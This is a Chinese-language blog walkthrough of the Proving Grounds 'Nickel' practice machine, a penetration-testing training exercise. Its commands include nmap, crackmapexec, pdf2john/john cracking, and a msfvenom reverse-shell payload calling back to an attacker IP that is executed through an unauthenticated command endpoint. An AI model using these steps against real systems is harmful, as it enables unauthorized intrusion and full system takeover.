Proving Grounds Practice : Nickel Walkthrough

 Proving Grounds Practice : Nickel Walkthrough


Foothole (立足點 ) :

  • 網頁 80 有個按鈕 "List Running Processes" 送出後跑 168.254~~ APIPA IP
  • 修改 IP 為靶機 IP,並改成 POST 後與加上 Content-Type、Content-Length 後成功抓到 Process
  • Process 中出現帳號與密碼 Hash,破解 Hash 後用驗證的帳號密碼 SSH 登入成功

PE ( 提權 ) :

  • 看到一個 PDF 檔案,john 破解加密密碼後得知 "Temporary Command endpoint"
  • 網頁測試可以直接輸入 command,執行 payload 後獲得管理者 Shell

注意事項 : 

  • 此靶機偏向 Web-200 的課程與 PEN-200 比較不相關,但可了解與學習 Web 相關應用


第一步 Rustscan



snmp closed



nmap,└─$ sudo nmap -sCV -A -p 21,22,80,135,139,445,3389,5040,7680,8089,33333,49664,49665,49666,49667,49668,49669 192.168.244.99 | tee nmap

21 FTP

22 SSH

80 HTTP

3389 Hostname:NICKEL

8089 HTTP

33333 HTTP



enum4linux



smbclient list check



ftp 匿名登入失敗



ftp ftp:ftp 登入失敗



whatweb



80 /



80 /robots.txt




8089 /



8089 /robots.txt


點了第一個 "List Current Deployments" 跳轉到 APIPA IP 169.254.129.94 33333 Port 某個網頁


第二個、第三個按鈕也都沒反應,因為都轉到 169.254.129.94




手動直接在網址改 IP 一樣沒東西




33333 /



33333 /robots.txt



用 Burp Suite 修正 GET 送出的 Host IP

將 169.254.129.94 改成靶機的 IP,一樣沒有任何結果

將 GET 改成 POST 送出看看

注意這裡用到 POST 所以要加上 "Content-Type: application/x-www-form-urlencoded"

出現要求 content length 的訊息,預設沒有這個值




這一次再加上 "Content-Length: 0" 送出看看



出現 Process 了



發現了一組帳號密碼,密碼看起來像是 HASH

--user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK"



hashes.com 破解看看得到密碼 "NowiseSloopTheory139"

現在擁有一組帳號密碼 ariah:NowiseSloopTheory139



crackmapexec 試試看,└─$ crackmapexec smb 192.168.244.99 -u 'ariah' -p 'NowiseSloopTheory139'

看來是一組有用的驗證



evil-winrm 連線測試失敗



hydra SSH 測試看看,看來可以登入,那就直接登入看看



進去了,拿到初步登入點




開始 PE,whoami /priv



在 C:\ 目錄底下發現一個有趣的檔案 output.txt



看了一下內容如下,主要是這一段 Host Application: C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -WindowStyle Hidden -NoProfile -Command C:\freezeScript\

win10.ps1

但查了一下沒有 C:\freezeScript 這個路徑




C:\ftp 的路徑跟 FTP 登入時的 Root Path 是一樣的,裡面是一個 PDF 檔案



開啟 PDF 需要密碼,這看來就很有梗



破解看看,└─$ pdf2john Infrastructure.pdf > pdf.hash

破解 Hash 看看

└─$ john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt

獲得一組密碼 : ariah4168



開啟 PDF 檔,看來要寫死 hosts file 再去存取一次 Web 試試看



加了 Hosts 再存取看看,沒啥不一樣的地方



不過 PDF 寫 [ Temporary Command endpoint ],讓我們想要測試 command 看看

結果在一輪測試後發現使用 ? 加上 command 可以成功執行

http://nickel/?whoami,而且還是 nt authority\system



建立 payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.224 LPORT=4444 -f exe -b '\x00\x0d\x0a' -o shell.exe



上傳 payload




URL encode,cmd.exe /c c:\users\ariah\desktop\shell.exe




執行 payload,nickel/?cmd.exe%20%2Fc%20c%3A%5Cusers%5Cariah%5Cdesktop%5Cshell.exe

4444 listener 進來了,確認是管理者




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(1)